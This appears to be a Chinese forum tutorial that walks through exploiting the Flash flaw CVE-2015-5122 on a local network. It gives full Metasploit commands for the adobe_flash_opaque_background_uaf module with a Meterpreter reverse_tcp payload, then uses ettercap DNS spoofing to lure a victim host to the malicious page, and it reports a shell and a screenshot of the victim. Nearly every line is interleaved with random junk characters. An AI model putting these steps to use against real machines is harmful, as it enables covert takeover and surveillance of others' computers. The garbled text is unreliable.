4 v% h6 w+ q0 z9 t3 t* ?9 V @
二、cve2015-5122漏洞实例演示虚拟机 $ v6 Q/ I# j" I# m
+ K1 ?9 M- F4 I8 B
! y% g& c' R/ z0 R8 K# k
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
# x, V% C0 w" U) e3 X- y' {; x . [7 ^1 x- O+ H% x& F! Z9 E
V, h& \+ N' ?: f search cve-2015-5122如图: 2 E9 r' H, }5 e9 V. w. U7 L7 Z
, L& W' B- O6 }6 b# f& ~- w/ t' V" r( Y. `9 l7 c+ q9 [) K; l
/ O+ j5 D* p1 G) s# p6 N % x' v0 S' E$ r/ ~! }
4 W U$ t5 g! i! i
下面我们敲如下命令: ( B8 m4 [/ q" X
& E6 P M! w3 A0 {8 P
) Z9 U0 ^$ h. @& f& h y$ W use exploit/multi/browser/adobe_flash_opaque_background_uaf ! @9 }' V9 c! b& J
6 o I8 H( L3 B
6 o% ^* O- o7 t+ J) G set PAYLOAD windows/meterpreter/reverse_tcp
/ n6 d+ r4 K, h% |+ b / j, [9 n% M# U5 |1 g$ G
- v* Q3 |8 E1 S7 i0 R: X set LHOST 192.168.0.109
6 a1 s/ @$ B+ f ?7 o3 m" ? ( R( v! S2 L! P, }
# [' J4 ^+ ?' o& v8 `; J$ e set URIPATH / /*根目录*/ ( F6 E( U c* m! x- c6 M
5 P; D8 C X/ W' E
" ^& G, j' E. H" j2 x set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
/ B; `7 x! D, W8 M B, A( V, T7 d
4 m' ?0 n+ `- C' ^! \+ @) V
1 ~$ l+ L, S7 z) s# X) E- f set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
4 F+ W( D2 w9 t % I# F( |/ E" P! P2 b! O L8 x3 g
/ c _) }. {6 ~1 }) C, ~* s 然后show options如图: , s+ h5 o' ^$ |) k+ n% `
( v3 Z( I5 b! m% i$ B, \: y
& N/ k8 E' n3 |9 u4 H
5 F# b7 E: H7 p3 B1 ~ f& t, v ; W( \9 ~3 z0 B8 @8 W& v( w
4 ]5 e4 V- d8 l! o0 D
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
5 D3 [7 v j3 Q3 [3 ~+ y, E9 v( L0 F4 K
/ b0 J, y( C! v8 _ , i9 ^# S3 t9 c2 q; k1 I$ x, x5 _
" N2 B3 ]. f B; }( O
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 " Z4 E. H1 y# c1 m" u# s
! w( S1 t( b. E, p& n# b# Q" Q4 _1 H0 K
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
# n1 i' ]& D8 d' |5 g
# X- @8 L2 }. K, Q& R
/ ~. H4 r+ g _/ K/ W
# Z U* ^5 N! R5 `. A
( f( \3 I3 x- N- N# O6 @3 z
' @, m3 F d6 G: b4 @9 q! w 成功了,这时候我们断开ettercap,如图: / @% d) r, k( F! `! @
+ z/ k% v) g' y5 A
- ~& @, d6 H) u. x/ g B0 Y
, h4 \5 b1 @# n# Y9 }! L
. S1 L- a" @4 h# z; c) d
* n, o) ?+ `5 g' o Screenshot如图: ; p5 o! G# U! P. S! F! x
% w8 A+ ] R! V# Y( j' ]; {3 d! n' I5 ]$ A. Y0 z
+ j( Z% R! O5 s; e; c' z& D 5 w2 R6 \/ B5 e( S
' b5 K$ E' J# y1 t 5 m5 i' J4 u; H/ B0 h
|